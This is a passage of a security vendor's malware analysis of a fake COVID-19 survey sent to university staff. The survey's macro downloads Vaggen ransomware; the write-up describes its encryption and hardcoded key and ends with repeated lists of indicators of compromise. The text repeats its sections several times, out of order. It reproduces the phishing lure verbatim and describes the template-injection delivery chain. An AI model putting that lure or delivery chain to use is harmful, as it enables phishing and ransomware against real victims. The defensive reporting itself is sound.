3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 389 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 390 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 391 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 392 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 393 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 394 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 395 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 396 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 397 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 398 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 399 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 400 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 401 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 402 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 403 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 404 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 405 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 406 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 407 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 408 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 409 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 410 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 411 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 412 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 413 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 414 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 415 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 416 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 417 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 418 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 419 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 420 of 3467\n\nGets the %APPDATA% 